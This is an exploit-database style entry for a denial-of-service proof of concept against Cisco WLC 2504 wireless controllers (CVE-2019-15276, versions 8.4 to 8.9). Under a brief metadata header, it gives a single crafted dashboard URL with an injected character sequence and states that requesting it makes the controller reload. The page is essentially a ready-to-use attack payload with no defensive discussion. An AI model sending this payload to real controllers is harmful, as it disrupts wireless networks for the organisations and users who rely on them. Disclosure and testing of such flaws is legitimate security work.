Cisco WLC 2504 8.9 – Denial of Service (PoC)

Cisco WLC 2504 8.9 – Denial of Service (PoC)

– Exploit Details

# Exploit Title: Cisco WLC 2504 8.9 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2019-11-25
# Exploit Author: SecuNinja
# Vendor Homepage: cisco.com
# Software Link: //tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20191106-wlc-dos
# Version: 8.4 to 8.9
# Tested on: not applicable, works independent from OS
# CVE : CVE-2019-15276

# Exploit PoC:

//WLCIPorHostname/screens/dashboard.html#/RogueApDetail/00:00:00:00:00:00">'>

# Firing this code will cause the system to reload which results in a DoS condition.
            

.




TAGS
Share This

COMMENTS

Wordpress (0)
Disqus ( )